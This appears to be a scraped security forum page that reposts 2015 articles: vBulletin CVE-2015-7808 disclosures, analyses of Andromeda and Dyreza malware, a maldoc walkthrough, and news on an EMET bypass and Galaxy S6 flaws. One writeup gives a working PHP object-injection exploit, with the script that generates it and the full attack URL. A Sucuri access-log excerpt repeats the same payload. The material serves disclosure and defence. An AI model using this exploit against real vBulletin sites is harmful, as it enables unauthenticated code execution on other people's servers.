Check Point Discovers Critical vBulletin 0-Day by Check Point Research Team posted 2015/11/05 vBulletin is a commercial forum and blog platform developed by vBulletin Solutions, Inc. It was created over 10 years ago and is written in PHP. It is the world’s most popular forum platform, powering ~78% out of the forums in the top 100K web-sites. Currently there are estimated to be over 40,000 live sites using vBulletin. A month ago, Check Point privately reported a critical unauthenticated RCE vulnerability to vBulletin support. This vulnerability was independently discovered by Netanel Rubin, and assigned CVE-2015-7808. When exploited, the vulnerability allows an attacker to execute PHP code on any vBulletin server without requiring user authentication. It does not require any themes or modules other than the ones installed by default. As widely reported, the main vBulletin.org forum was compromised earlier this week and an exploit for a vBulletin 0-day was up for sale in online markets. A patch later released by vBulletin fixes the vulnerability reported, but fails to neither credit any reporting nor mention the appropriate CVE number. As the vulnerability is now fixed and an exploit exists in the wild with public analyses, we follow with the technical description as submitted to vBulletin. If you administer any vBulletin web site, we urge you to apply the patch as soon as possible, as exploitation risk is imminent. It is important to note the analyzed public exploit shows a different chain than the one we used for our PoC; therefore we cannot link the attacks directly to our report. Disclosure Timeline [TABLE=width: 734] [TR] [TD=width: 84]Oct 4 2015[/TD] [TD=width: 554]First contact with vBulletin[/TD] [/TR] [TR] [TD=width: 84]Oct 5 2015[/TD] [TD=width: 554]First response received, asked for PGP key to securely transfer report[/TD] [/TR] [TR] [TD=width: 84]Oct 6 2015[/TD] [TD=width: 554]PGP request denied: “I will hide the response so it’s not publicly available”[/TD] [/TR] [TR] [TD=width: 84]Oct 10 2015[/TD] [TD=width: 554]Sent complete report unencrypted as attached PDF[/TD] [/TR] [TR] [TD=width: 84]Oct 11 2015[/TD] [TD=width: 554]“We cannot accept attachments in our ticket system – please upload this to your server and provide a link to download this.”[/TD] [/TR] [TR] [TD=width: 84]Oct 11 2015[/TD] [TD=width: 554]Uploaded report to a public server and sent a link. Updated with CVE-2015-7808 assignment.[/TD] [/TR] [TR] [TD=width: 84]Oct 14 2015[/TD] [TD=width: 554]Asked vBulletin for confirmation/update[/TD] [/TR] [TR] [TD=width: 84]Oct 14 2015[/TD] [TD=width: 554]“We’re still working to establish the issues and identify any fixes that may be required.”[/TD] [/TR] [TR] [TD=width: 84]Oct 27 2015[/TD] [TD=width: 554]Asked vBulletin for confirmation/update[/TD] [/TR] [TR] [TD=width: 84]Oct 27 2015[/TD] [TD=width: 554]“We’re still working to establish the issues and identify any fixes that may be required.”[/TD] [/TR] [TR] [TD=width: 84]Nov 2 2015[/TD] [TD=width: 554]Patch released by vBulletin[/TD] [/TR] [TR] [TD=width: 84]Nov 5 2015[/TD] [TD=width: 554]Public disclosure[/TD] [/TR] [/TABLE] Technical Description vBulletin handles a lot of the heavy lifting through an internal API. Unfortunately parts of that API are also used as a gate for Ajax requests, and as a result this API is also accessible through the regular CGI. This API does not validate the origin of the request, allowing us to access any part of its interface. That interface, in fact, allows us to call any public method in any class that inherits from ‘vB_Api’ and located in ‘/core/vb/api/’. This folder contains dozens of classes and hundreds of methods for us to use as an attack surface, and as noted, some of them considered internal methods. Moreover, we can call these methods with any arguments we’d like, as the API doesn’t have any sort of argument white listing. Our findings begin with the vulnerable method ‘vB_Api_Hook:: decodeArguments()’, which, again, requires no authentication, and at its first line of code contains an ‘unserialize’ call. This can be seen in the following code: Because we control the ‘$arguments’ parameter we can also control what goes into the ‘unserialize()’ call. That means we can actually craft and inject any object we’d like into the ‘$args’ variable. PHP objects share several ‘magic methods’ that get called automatically whenever specific events occur. Such a trigger event, for example, is the destruction of an object (the ‘__destruct()’ method gets called), or an attempt to use an object as a string, triggering its ‘__toString()’ method. That means we can now trigger a call to any ‘__destruct()’ method for any defined class. We only set our object to be of that type, and when the ‘decodeArguments()’ function returns, that object will get destructed. Examine the following interesting destructor for vB_vURL: This method takes the ‘tmpfile’ property and treats it as a file name that, if exists, gets deleted. This can obviously be exploited to remove any file accessible to the web server, most likely rendering the server inoperable, or even causing permanent data loss. However, we are after higher goals. We can leverage this code to gain more access to protected methods in objects. If we insert another object into ‘tmpfile’, an attempt to convert it into a string will happen once the ‘file_exists()’ call is reached. In effect, this now added all ‘__toString()’ methods to our widening attacking surface. Take a look at vB_View’s ‘__toString()’: This ‘__toString()’ make a call to vB_View’s ‘render()’ method right off the bat. Unfortunately, this base ‘render()’ method doesn’t do anything of interest for our exploitation purposes. Consider, however, the ‘vB_View_AJAXHTML’ class, inheriting from vB_View, and implementing a very different ‘render()’ method: As seen above, this ‘render()’ calls another ‘render()’, for the object under the ‘content’ property. Since we can control that one, too, we can now target our ‘render()’ call at any class (not only vB_View objects). This leads us to the ‘vB5_Template’ class, which implements its own ‘render()’ method: Basically, this method loads a template from the cache or DB using the template name specified in the ‘template’ property. Afterwards, it evals or includes it based on the template type. Because the template name is only used inside a (properly escaped) SQL query, we can’t use it for a LFI attempt. Still, this allows us to load any template we want from the DB. Let’s look at the ‘widget_php’ template code: The ‘code’ value in the ‘$widgetConfig’ dictionary is the argument for a function which (ultimately) evals its content. If we could control this variable, we would be able to execute any PHP code we’d like on the server. Let’s see how we do exactly that. The ‘render()’ method at the ‘vB5_Template’ class call the ‘extract()’ function with the ‘$this->registered’ as an argument. As some readers may observe, ’extract()’ receives a key-value dictionary as an argument and adds the key-value pairs as variables and respective values to the current scope. Because we control ‘$this->registered’, we can add any variable and value to the current scope. Finally, we add the ‘$widgetConfig’ variable to the ‘registered’ property, set its value as a dictionary containing ‘code’ as a key and our exploit PHP code as its value. POC Sursa: http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/

Revisiting the latest version of Andromeda/Gamarue Malware 2015/11/05 / Blueliv Andromeda/Gamarue malware has been prevalent since it came into limelight a couple of years ago. Also, the author keeps it well updated ever since. With respect to its earlier avatars, it has gone through several changes from anti-analysis to a change in protocol format. Some excellent write-ups have already been made on it [1][2] previously, but in this blog we will revisit and analyze the latest version.Andromeda-Gamarue hides itself though many layers and its default one.Since its inception it has made use of many techniques to defeat extraction of embedded configuration (url, keys, etc.), such as using a fake encryption, fake urls, config encryption and many more.Meanwhile we also found a sample which had obfuscation techniques such as opaque predicates to hinder static-analysis. Andromeda-Gamarue consists of two payloads, a default unpacker and a main payload. We are going to cover up both in this post.It starts with loading up some of the native functions identified by hashes using a simple hashing algorithm and stores the API address in stack variables. To get a basic overview of the binary we will generate a run time dynamic call graph to help us understand the functionality to some extent. It shows some calls to LdrProcessRelocateBlock(), which gives us an indication about where and how the payload is unpacked. The binary consist of a data blob in the .rdata section of a PE file which holds information regarding the unpacked payload. It has the following structure: The integrity of the payload is checked against a hard coded crc32 hash value and, if the hash is verified, it further proceeds to decrypt and decompress the payload using a 16 byte rc4 key and APLIB decompression. This chunk is copied to an allocated heap region which is purposely created by using MEM_COMMIT or MEM_TOP_DOWN, which might be used to bypass some scanning engine or dumpers. The base relocations are applied on that memory region using the RelocationTableOffset field. Another block of executable memory region of size 1000h is allocated, which will later on be used for copying stolen API code. Then, Dll and Imports are parsed. Dll names can again be found as hashes.The first instruction is copied from an API location to this particular memory region and a succeeding jump is placed after that to the original instructions. This is done to bypass API hooking. It consists of an x86 instruction parsing subroutine. Subroutine calls and unconditional jumps follow, subsequent instructions are copied and a jump to OEP is made. MAIN PAYLOAD The main payload consists of an installer and a primary payload responsible for communicating to the command and control centre. Let’s take a look to the call graph of the installer part: It starts by getting serial number for the root drive (which will later on be used as a part in the c2 request). It also has a function to check for the presence of certain processes and if they are found it goes in an infinite loop. These checks are bypassed if a registry key “is_not_vm” is found in HEY_LOCAL_MACHINE software\\policies. The key has to be equal to VolumeSerialNumber. An environment variable is created from xoring VolumeSerialNumber with 0x737263, which is assigned to the module file name. This environment variable acts as an indicator for the previous instance of binary. It also sets up an event named after xoring VolumeSerialNumber xoring with 0x696E6A63. This payload is injected inside “msiexec.exe” by changing the entry point to push <base of injected code> ret and waits for the event to be triggered by the main payload.The main payload nulls the packer PE headers and sections. Following this, it adjusts the privileges, sets TaskbarNoNotification, and disables UAC, Windows Action centre, as well as some security related services (only if the “bb” parameter is not set). Explained below: If necessary privileges are not found, it will try to elevate the privileges by using the “Runas” verb. C2 servers are encrypted and stored using a crc32 hash of PE data and an incremental XOR value.After that, it makes connection to each c2 with the following json request:{“id”:%lu,”bid”:%lu,”os”:%lu,”la”:%lu,”rg”:%lu,”bb”:%lu}ID = VolumeSerialNumberBID = botnetIDOS = OSVersionLA = Local IP addressRG = isprivileged?BB = islocalized (Russia, Ukraine, Belarus and Kazakhstan)This request is encrypted using a 32 bytes rc4 key and the response is also decrypted using the same rc4 key (earlier versions would have used 4 bytes ID as a response key). The request also comes in a JSON format now. It consists of a json parser compiled from https://github.com/udp/json-parser/.The return value from jsonparser is represented this way: The above JSON structure is expressed in the following format:[next_request_sleeptime (minutes) ,{Unimplemented_object}, [TaskID, RequestType, ‘URL’-N/A ]……]The first item in the array is the next request sleep time. It is the time frame in minutes when next iteration of calling c2 is performed.The second in the list is an unimplemented / unused type. When this object is found, it is simply skipped.The rest are single or multiple arrays which may consist of a url payload. TaskID is the UID of a task provided by the c2 server. This ID is sent back in a following request. The request type is an identifier of the task type of an eg download url, plugin download or delete bot. These urls can either be exe or plugins. Plugins are encrypted and compressed with RC4 and APlib. After completing the specified task, another request is sent back to the c2 server which has the following format:{“id”:%lu,”tid”:%lu,”err”:%lu,”w32?:%lu}ID: VolumeSerialNumberTID: TaskIDERR: Error Level on task completion (0 – no error starting from 0x10)W32: Error Number from GetLastError() Raashid Bhat Malware Analyst Sursa: https://www.blueliv.com/research/revisiting-the-latest-version-of-andromedagamarue-malware/

vBulletin 5 PreAuth RCE writeupby @_cutz As came to my attention a guy named Coldzer0 is selling a vBulletin RCE expoit on http://0day.today. In his video he exploited several vBulletin boards while surfing on Google... This ended in the vBulletin main forum being pwned on monday (11/02/15). vBulletin implements certain ajax API calls in /core/vb/api/, one of them is hook.php: public function decodeArguments($arguments) { if ($args = @Unserialize($arguments)) { $result = ''; foreach ($args AS $varname => $value) { $result .= $varname; Apart from the obvious unserialize() not much else happening there -- luckily we have in /core/vb/db/result.php: class vB_dB_Result implements Iterator { ... public function rewind() { //no need to rerun the query if we are at the beginning of the recordset. if ($this->bof) { return; } if ($this->recordset) { $this->db->free_result($this->recordset); } rewind() is the first function to get called when an Iterator object is accessed via foreach(). Then we have in /core/vb/database.php: abstract class vB_Database { ... function free_result($queryresult) { $this->sql = ''; return @$this->functions['free_result']($queryresult); } Which gives easy RCE. Setup objects accordingly: $ php << 'eof' <?php class vB_Database { public $functions = array(); public function __construct() { $this->functions['free_result'] = 'phpinfo'; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } print urlencode(serialize(new vB_dB_Result())) . "\n"; eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D Just surf to: [url]http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D[/url] The fix was just replacing the unserialize() with json_decode(). Btw this bug has been sitting in vBulletin for more than three years. -- cutz Sursa: Private Paste - Pastie

Windows Subsystem Used to Bypass Microsoft EMET By Eduard Kovacs on November 03, 2015 Researchers have once again managed to bypass Microsoft’s Enhanced Mitigation Experience Toolkit (EMET), this time by leveraging the Windows subsystem WoW64. WoW64 (Windows 32-bit on Windows 64-bit) is a compatibility layer in Windows designed to allow unmodified 32-bit applications to run on 64-bit systems. While it’s very useful, researchers demonstrated in the past that WoW creates an attack surface that can be used by malicious actors to bypass antivirus software and exploit mitigations. Researchers at two-factor authentication (2FA) solutions provider Duo Security have found a way to use WoW64 to bypass Microsoft EMET, a tool designed to make it more difficult and more expensive for attackers to exploit a system. While EMET bypass methods have been presented several times in the past, Duo Security says its method can be used to bypass all payload execution and return-oriented programming (ROP) mitigations in one shot, in a generic, app-independent way. According to Duo Security, 80 percent of browsers are 32-bit processes running under WoW64 on a 64-bit system. This is relevant in this case as web browser exploitation is one of the most common vectors used by malicious actors to breach systems. In order to demonstrate their findings, researchers modified an existing exploit for a use-after-free vulnerability in Adobe Flash Player (CVE-2015-0311). They successfully reproduced the bypass on a 64-bit version of Windows 7 running Internet Explorer 10 and the latest versions of EMET, 5.2 and 5.5 beta. “While EMET provides support for both 32 and 64-bit processes, as a limitation of its design, it does not explicitly handle the special case of WoW64 processes. This makes using a 64-bit ROP chain and secondary stage a relatively straightforward method for bypassing a significant number of EMET’s mitigations,” Duo Security explained in its research paper. “Furthermore, 64-bit editions of EMET do not support any of the ROP-related mitigations, further limiting EMET’s effectiveness on 64-bit processes. It appears that due to these limitations, enhancing EMET to overcome them is likely a non-trivial effort.” Darren Kemp, researcher at Duo Security, has pointed out that the paper’s goal is not to undermine the importance of EMET’s role in defending organizations against cyberattacks, but to highlight shortcomings in the current version. “EMET is largely effective at complicating a variety of exploitation techniques in true 32- and 64-bit applications, often requiring attackers to find a solution to each mitigation on a case- by-case basis. Most off-the-shelf exploits will fail in the face of EMET mitigations,” Duo Security said. “But due to the architectural quirks of the WoW64 subsystem, mitigations provided by EMET are significantly less effective due to the way they are inserted into the process. Fixing this issue requires significant modifications to how EMET works.” Microsoft has provided the following statement: We continue to research new mitigations to integrate into the Enhanced Mitigation Experience Toolkit (EMET). Deploying EMET helps make it more difficult for attackers to exploit a system, which moves the balance of power in the customer’s favor. Sursa: http://www.securityweek.com/windows-subsystem-used-bypass-microsoft-emet

A Technical Look At Dyreza In a previous post we presented unpacking 2 payloads delivered in a spam campaign. A malicious duet – Upatre(malware downloader) and Dyreza (credential stealer). In this post we will take a look at the core of Dyreza – and techniques that it uses. Note, that Dyreza is a complex piece of malware and various samples come with various techniques – however, the main features remain common. Analyzed samples ff3d706015b7b142ee0a8f0ad7ea2911 – Dyreza executable- a persistent botnet agent, carring DLLs with the core malicious activities 5a0e393031eb2accc914c1c832993d0b – Dyreza DLL (32bit) 91b62d1380b73baea53a50d02c88a5c6 – Dyreza DLL (64 bit) Behavioral analysis When Dyreza starts to infect the computer – it spreads like fire. Observing it in Process Explorer, we can see many new processes appearing and disappearing. As we can notice, it deploys explorer, svchost, taskeng, loads some DLL via dllhost… All this is done in order to obfuscate the flow of execution, in hopes of confusing analyst. 2 copies of the malicious file are dropped – in C:\Windows and %APPDATA% – under pseudo-random names, matching the regex: [a-zA-Z]{15}.exe , i.e vfHNLkMCYaxBGFy.exe That persistence is achieved by adding a new task in the task scheduler – it deploys the malicious sample after every minute, to ensure that it keeps running. Code injected into other processes (svchost, explorer) communicates with the C&C: When we deploy any web browser, it directly injects the code into its process and deploys illegitimate connections.It is the way to keep in touch with the C&C, monitor user’s activity and steal credentials. We can also see SQLite files (etilqs_*) created in a TEMP folder that are serving as a small database, where Dyreza stores information. Collected data are stored in a dedicated folder before they are sent to the C&C: Inside the code Main executable Dyreza doesn’t start on a machine that has less than 2 processors. This technique is used as a defense, preventing file from running on VM. It is based on the observation that VM usually have only one processor – in contrast to most physical machines used nowadays. It is implemented by checking appropriate field in PEB (Process Environment Block), that is pointed by FS:[30]. Infection continues only if the condition is satisfied. At the beginning of execution, malware loads additional import table into a newly allocated memory page. Names of modules and functions are decrypted at runtime. It checks, if it is deployed under debugger – using function LookupPrivilegeValue with argument SeDebugPrivilege – if it returns non-zero value, execution is terminated. Valid execution follows few alternative paths. Decision, by which path of to follow is made based on the initial conditions – like, executable path and arguments with which the program was run. When it is deployed for the first time (from a random location), it make its own copy into C:\Windows and %APPDATA% and deploy the copy as a new process. As an argument to a deployed copy (from C:\Windows) it passes a path to the other copy. If it is deployed from the valid path and the initial argument passed validation, it performs another check – verifying if it is deployed for the first time. It is achieved by creating a specific Global (it’s name is a hash of Computer name and OS Version – fetched by functions: GetComputerName, RtlGetVersion). If this condition is also satisfied and mutex already exist, then it follows the main path, deploying the malicious code. First, the encrypted data and the key are loaded from the executable’s resources. T1RY615NR – encrypted 32 bit code, UZGN53WMY – the key, YS45H26GT – encrypted 64bit code Unpacking: The unpacking algorithm is pretty simple – key_data contains values and data – list of indexes of the values inkey_data. We process the list of indexes and read the corresponding values: def decode(data, key_data): decoded = bytearray() for i in range(0, len(data)): val_index = data decoded.append(key_data[val_index]) return decoded This script decrypts dumped resources: https://github.com/hasherezade/malware_analysis/blob/master/dyreza/dyreza_decoder.py The revealed content contains a shellcode to be injected and a a DLL with malicious functions (32 or 64 bit appropriately). The main sample chooses which one to unpack and deploy, by checking if it is running via WOW64 (emulation for 32 bit on 64 bit machine) – calling function IsWow64Process. Malicious DLL (core) At this stage, functionality of the malware becomes pretty clear. The DLL does not contain much obfuscation – it has clear strings and a typical import table. We can see the strings that are used for communication with the C&C: Both – 32 and 64 bit DLLs have analogical functionality. Only architecture-related elements and strings are different. The agent identifies the system and sends the information to the C&C: Similar procedure is present in the 64 bit version of the DLL, only the hardcoded string “_32bit” is substituted by “_64bit”: Also, network settings are examined (to verify and inform the C&C whether the client can establish back connection – command : AUTOBACKCONN) It injects its modules in following browsers: Below – attempt to send stolen account credentials: In addition to monitoring browsers, it also collects general information about the computer (it’s configuration, existing users) – in form of a report: The malware not only steal information and sniff user’s browsing, but also tries to take a full control over the system – executes various shell commands – system shutdown,etc. Some examples below: Trying to add a user with administrative privileges Shutdown system on command (AUTOKILLOS) C&Cs This botnet is prepared with great care. Not only communication is encrypted, but also many countermeasures have been taken in order to prevent detection. First of all, the address of the C&C is randomly picked from a hard-coded pool.This pool is stored in one of the resources of Dyreza DLL (AES encrypted). Below, we can see how it gets decrypted, during execution of the payload: (A script for decrypting list of C&Cs from dumped resources is available here:https://github.com/hasherezade/malware_analysis/blob/master/dyreza/dyrezadll_decoder.py) Also, the certificate served by a particular C&C changes on each connection. The infrastructure is built on the network of compromised WiFi routers (most often: AirOS, MicroTik). The server receives encrypted connection on port 443 (standard HTTPS) or 4443 (in case if standard HTTPS port of a particular router is occupied by a legitimate service). Conclusion Dyreza is an eclectic malware, developed by professionals. It is clear that they are constantly working on a quality – each new version carries some new ideas and improvements, making analysis harder. Appendix Very good Dyreza/Upare tracker: https://techhelplist.com/maltlqr/ – by @Techhelplistcom (list of C&Cs from the current sample: https://techhelplist.com/maltlqr/reports/01oct-20oct-status.txt ) Scripts used in this post: https://github.com/hasherezade/malware_analysis/tree/master/dyreza Sursa: https://blog.malwarebytes.org/intelligence/2015/11/a-technical-look-at-dyreza/

Analysis Of An Office Maldoc With Encrypted Payload (Quick And Dirty) Didier Stevens @ 0:00 The malicious office document we’re analyzing is a downloader: 0e73d64fbdf6c87935c0cff9e65fa3be oledump reveals VBA macros in the document, but the plugins are not able to extract a URL: Let’s use a new plugin that I wrote: plugin_vba_dco. This plugin searches for Declare statements and CreateObject calls: In the first half of the output (1) we see all lines containing the Declare or CreateObject keyword. In the second half of the output (2) we see all lines containing calls to declared functions or created objects. Although the code is obfuscated (obfuscation of strings and variable names), the output of this plugin allows us to guess that Ci8J27hf2 is probably a XMLHTTP object, because of the .Open, .send, .Status, … methods and properties. The Open method of the XMLHTTP object takes 3 parameters: the HTTP method, the URL and a boolean (asynchronous or synchronous call): As we can see, the third parameter is False and the first 2 parameters are the return value of a function called IpkfHKQ2Sd. This function takes 2 parameters: 2 strings. The first string is the result of concatenated Chr functions, and the second string is a literal string. Since the Open method requires the HTTP method and URL as strings, is very likely that function IpkfHKQ2Sd is a decoding function that takes 2 strings as input (meaningless to us) and returns a meaningful string. Here is the original IpkfHKQ2Sd function. It’s heavily obfuscated: Here is the same function that I deobfuscated. I didn’t change the function name, but I removed all useless code, renamed variables and added indentation: We can now see that this function uses a key (sKey) and XOR operations to decode a secret string (sSecret). And now we can also see that this is just a string manipulation function. It does not contain malicious or dangerous statements or function calls. So it is safe to use in a VBA interpreter, we don’t need to translate it into another language like Python. We are going to use this deobfuscated function in a new spreadsheet to decode the URL parameter: In the VBA editor of this new spreadsheet, we have the deobfuscated IpkfHKQ2Sd function and a test subroutine that calls the IpkfHKQ2Sd function with strings that we found in the .Open method for the URL argument. The decoded string returned by function IpkfHKQ2Sd is displayed via MsgBox. Executing this test subroutine reveals the URL: Downloading this file, we see it’s not a JPEG file, but contrary to what we could expect, it’s neither an EXE file: Searching for .responseBody in the VBA code, we see that the downloaded file (present in .responseBody) is passed as an argument to function IpkfHKQ2Sd: This means that the downloaded file is also encoded. It needs to be decoded with the same function as we used for the URL: function IpkfHKQ2Sd (but with another key). To convert this file with the deobfuscated function in our spreadsheet, we need to load the file in the spreadsheet, decode it, and save the decoded file to disk. This can be done with myFileContainer.xls tool (to be released). First we load the encoded file in the FileContainer: FileContainer supports file conversion: we have to use command C and push the Process Files button: Here is the default conversion function Convert. This default function doesn’t change the file: the output is equal to the input: To decode the file, we need to update the Convert function to call the decoding function IpkfHKQ2Sd with the right key. Like this: And then, when we convert the file, we obtain an EXE file: This EXE turns out to be Dridex malware: 50E3407557500FCD0D81BB6E3B026404 Remark: reusing code from malware is dangerous unless we know exactly what the code does. To decode the downloaded file quickly, we reused the decoding VBA function IpkfHKQ2Sd (I did not translate it into another language like Python). But to be sure it was not malicious, I deobfuscated it first. The deobfuscation process gave me the opportunity to look at each individual statement, thereby giving me insight into the code and come to the conclusion that this function is not dangerous. We could also have used the obfuscated function, but then we ran the risk that malware would execute because we did not fully understand what the obfuscated function did. Translating the obfuscating function to another language doesn’t make it less dangerous, but it allows us to execute it in a non-Windows environment (like Linux), thereby preventing Windows malware from executing. Sursa: Analysis Of An Office Maldoc With Encrypted Payload (Quick And Dirty) | Didier Stevens

By Daniel Cid on November 4, 2015 The vBulletin team patched a serious object injection vulnerability yesterday, that can lead to full command execution on any site running on an out-of-date vBulletin version. The patch supports the latest versions, from 5.1.4 to 5.1.9. The vulnerability is serious and easy to exploit; it was used to hack and deface the main vBulletin.com website. As a precaution, all passwords were reset; you will have to create a new one before you can access vbulletin.com again and download the patches. Exploits in the Wild This vulnerability seems to have been around for a bit. We were able to trace exploit attempts to the end of October, they were targeting a few high profile vBulletin sites protected by our Website Firewall. The exploit was shared publicly yesterday. It attacks the decodeArguments Ajax API hook. Here is an example of an exploit attempt in the wild: 108.47.xx.yy – – [02/Nov/2015:22:18:21 -0500] “GET /vbforum[/]ajax/api/hook/decodeArguments? arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00 db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22 %3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22 %3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D%22 Once decoded, it executes: vB_Database”:1:{s:9:”functions”;a:1:{s:11:”free_result”;s:7:”phpinfo”;}}s:12:” This shows the attacker the result of phpinfo indicating that his exploit succeeded. If this test payload works, the attacker will proceed with a full compromise. We are not seeing widespread exploitation attempts yet, as just a few high profile sites were targeted, but we expect it to change soon as it makes its way into the automation engines. Patch and Protect If we have not emphasized before, you have to patch your vBulletin site now! Websites behind ourWAF are (and always were) protected against this vulnerability due to our virtual hardening technology. If you can not patch your vBulletin site, we recommend looking at a solution to stop these exploits before they reach you. Sursa: https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html

Nu e, doar Bucuresti.

Google Researchers Find Serious Flaws in Galaxy S6 Edge By Eduard Kovacs on November 03, 2015 Researchers from Google’s Project Zero have identified nearly a dozen high severity vulnerabilities in the Android operating system running on Samsung Galaxy S6 Edge smartphones. While Google is the main developer of Android, device manufacturers such as Samsung, LG, HTC and Huawei have been using the Android Open Source Project (AOSP) source code to create their own variations of the mobile operating system. Project Zero wanted to put the security of an OEM device to the test to see how it compares against Google’s Nexus, for which the Internet giant has started releasing monthly security updates. “OEMs are an important area for Android security research, as they introduce additional (and possibly vulnerable) code into Android devices at all privilege levels, and they decide the frequency of the security updates that they provide for their devices to carriers,” Project Zero researcher Natalie Silvanovich said in a blog post. Ten researchers, members of Project Zero and other Google security teams, were tasked with finding vulnerabilities in Samsung’s Galaxy S6 Edge smartphone, which they claim to have chosen because it's a high-end device with a large number of users. They specifically looked for three types of issues that can be part of a kernel privilege escalation exploit chain, including gaining remote access to contacts, photos and messages, gaining access to such data from a Google Play application that requires no permissions, and using this access to persistently execute code even after a device wipe. A total of eleven high severity issues have been identified, the most serious being a path traversal vulnerability (CVE-2015-7888) in the Samsung WifiHs20UtilityService service that can be exploited to write arbitrary files on the system. The email client installed on Samsung Galaxy S6 Edge devices is also plagued by a serious flaw (CVE-2015-7889), which allows an attacker to forward a user’s emails to a different account via a series of intents from an unprivileged application. Another email client issue (CVE-2015-7893) can be exploited to execute arbitrary JavaScript code embedded in a message. Google researchers also found issues related to drivers (CVE-2015-7890, CVE-2015-7891, CVE-2015-7892), and image parsing (CVE-2015-7894, CVE-2015-7895, CVE-2015-7896, CVE-2015-7897, CVE-2015-7898). “Overall, we found a substantial number of high-severity issues, though there were some effective security measures on the device which slowed us down. The weak areas seemed to be device drivers and media processing. We found issues very quickly in these areas through fuzzing and code review. It was also surprising that we found the three logic issues that are trivial to exploit. These types of issues are especially concerning, as the time to find, exploit and use the issue is very short,” Silvanovich explained. The expert pointed out that while SELinux (Security-Enhanced Linux) provides significant protection, some of the bugs they have identified can be exploited to disable this kernel security module. Project Zero reported the vulnerabilities to Samsung in late July and eight of them were addressed by the vendor with its October maintenance release. The remaining three security bugs will be resolved later this month, but researchers say the unpatched issues have a lower severity. After the existence of the critical Stagefright vulnerabilities came to light this summer,Samsung, LG and other phone manufacturers announced their plans to release monthly security updates designed to patch Android vulnerabilities. But not all vendors rushed to make such commitments. HTC said it will push for monthly security updates, but the company has deemed monthly update guarantees “unrealistic.” Sursa: http://www.securityweek.com/google-researchers-find-serious-flaws-galaxy-s6-edge

Daca cineva e familiar cu unul dintre aceste limbaje si doreste sa invete mai multe si sa lucreze, sa imi dea un PM pentru mai multe informatii. Nu am mai multe detalii, dar daca sunteti interesati va pot pune in legatura cu o persoana de la firma respectiva.